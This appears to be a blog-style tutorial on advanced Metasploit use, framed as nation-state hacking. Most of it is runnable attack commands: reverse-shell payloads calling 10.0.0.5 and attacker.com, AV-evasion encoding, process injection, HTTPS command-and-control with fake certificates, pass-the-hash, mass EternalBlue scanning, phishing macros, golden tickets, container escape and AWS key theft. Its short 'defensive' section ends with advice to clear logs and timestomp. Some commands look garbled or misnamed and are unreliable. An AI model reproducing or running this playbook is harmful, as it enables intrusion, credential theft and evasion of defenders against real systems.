The Ultimate Metasploit Mastery Guide Advance to Pro Part-2

 

Metasploit: From Advanced to Pro – Exploit Like a Nation-State Hacker

Introduction

You’ve mastered the basics of Metasploit—now it’s time to operate like a professional penetration tester or red teamer. This guide dives into advanced exploitation, evasion, automation, and real-world attack chains with detailed command breakdowns.

---

Table of Contents

1. Advanced Exploit Customization

2. Stealthy Payloads & Evasion

3. Post-Exploitation Mastery

4. Lateral Movement & Pivoting

5. Automation & API Integration

6. Real-World Attack Walkthroughs

7. Defensive Countermeasures

---

1. Advanced Exploit Customization

Manual Exploit Tweaking

Sometimes, public exploits fail due to custom environments, patches, or mitigations. Here’s how to adapt them:

Example: Modifying a Public Exploit

1. Locate the exploit:

   bash

   locate multi/handler
   cp /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb ~/custom_eternalblue.rb

2. Edit the exploit (Adjust offsets, ROP chains, or shellcode):

   ruby

   # Change the target’s return address (x64)
   'Targets' => [
     [ 'Windows 10 x64', { 'Ret' => 0x0000000140000000 } ]
   ]

3. Reload Metasploit:

   bash

   reload_all
   use exploit/custom_eternalblue

Key Exploit Options

bash

set VERBOSE true      # Debugging output
set CheckScrip true   # Verify target before attacking
set DisablePayloadHandler true  # Use external listener

---

2. Stealthy Payloads & Evasion

AV/EDR Bypass Techniques

1. Polymorphic Encoding

bash

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=443 -e x86/shikata_ga_nai -i 10 -f exe -o payload_encoded.exe

• -i 10: Iterate encoding 10 times.

• -f exe: Output format.

2. Process Hollowing (Inject into Legit Process)

bash

use post/windows/manage/process_inject
set PAYLOAD windows/meterpreter/reverse_https
set PID 1234  # Target process (e.g., explorer.exe)
run

3. HTTPS Beaconing (C2 Obfuscation)

bash

set payload windows/x64/meterpreter/reverse_https
set LHOST secure.c2server.com
set LPORT 443
set HandlerSSLCert /path/to/fake_cert.pem

---

3. Post-Exploitation Mastery

Privilege Escalation (Windows)

1. Token Impersonation

bash

load incognito
list_tokens -u
impersonate_token "NT AUTHORITY\\SYSTEM"

2. Kernel Exploits

bash

# Check vulnerability
run post/multi/recon/local_exploit_suggester

# Exploit (e.g., PrintNightmare)
use exploit/windows/local/cve_2021_1675_printspooler
set SESSION 1
exploit

Linux Privilege Escalation

bash

# SUID Finder
find / -perm -4000 2>/dev/null

# Exploit Dirty Pipe (CVE-2022-0847)
use exploit/linux/local/cve_2022_0847_dirtypipe
set SESSION 2
exploit

---

4. Lateral Movement & Pivoting

1. Pass-the-Hash (SMB)

bash

use exploit/windows/smb/psexec
set RHOSTS 192.168.1.20
set SMBUser Administrator
set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0  # NTLM hash
exploit

2. RDP Hijacking

bash

# Dump RDP sessions
run post/windows/gather/enum_rdp_sessions

# Hijack session (requires SYSTEM)
steal_token <PID>

3. Pivoting (Route Through Compromised Host)

bash

# Add route
run autoroute -s 10.1.1.0/24

# Scan internal network
use auxiliary/scanner/portscan/tcp
set RHOSTS 10.1.1.1-254
run

---

5. Automation & API Integration

1. Metasploit Resource Scripts

bash

# auto_pwn.rc
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.0/24
set THREADS 10
set PAYLOAD windows/x64/meterpreter/reverse_https
exploit -j

Run with:

bash

msfconsole -r auto_pwn.rc

2. Python Automation (MSFRPC)

python

import msfrpc
client = msfrpc.Msfrpc({'host': '127.0.0.1', 'port': 55553})
client.login('msf', 'password')
exploit = client.call('module.execute', ['exploit', 'windows/smb/psexec', {
    'RHOSTS': '192.168.1.10',
    'PAYLOAD': 'windows/meterpreter/reverse_tcp',
    'LHOST': '10.0.0.5'
}])

---

6. Real-World Attack Walkthroughs

Scenario 1: Phishing → Exploit → Domain Admin

1. Send malicious Office macro:

   bash

   msfvenom -p windows/meterpreter/reverse_https LHOST=attacker.com -f vba -o macro.txt

2. Gain initial access:

   bash

   use exploit/multi/handler
   set payload windows/meterpreter/reverse_https
   exploit

3. Escalate to DA:

   bash

   load kiwi
   dcsync_ntlm krbtgt
   golden_ticket_create -d DOMAIN -u FAKEUSER -s S-1-5-21-...

Scenario 2: Web App → Docker Escape → Cloud Compromise

1. Exploit vulnerable web app:

   bash

   use exploit/multi/http/struts2_code_exec
   set RHOSTS app.target.com
   exploit

2. Break out of container:

   bash

   checkcontainer  # Check if in Docker
   run post/linux/escalate/docker_escape

3. Steal AWS keys:

   bash

   cat /proc/self/environ | grep AWS_

---

7. Defensive Countermeasures

How Blue Teams Detect Metasploit

• Network signatures: Meterpreter’s HTTP/S beaconing.

• Process anomalies: msfconsole child processes.

• Log anomalies: Rapid SMB login attempts.

Evasion Checklist

✅ Use encrypted payloads (HTTPS, DNS tunneling).
✅ Avoid default Meterpreter (Customize C2 channels).
✅ Clear logs: clearev + timestomp.

---

Conclusion

You’re now equipped with nation-state-level Metasploit techniques. Key takeaways:

• Custom exploits bypass defenses.

• Evasion is critical for red team ops.

• Automation scales attacks.

What’s next?

• Practice on Advanced HackTheBox machines.

• Learn C2 frameworks (Cobalt Strike, Sliver).

• Study real-world APT reports for tradecraft.

🚀 Time to go pro! 🚀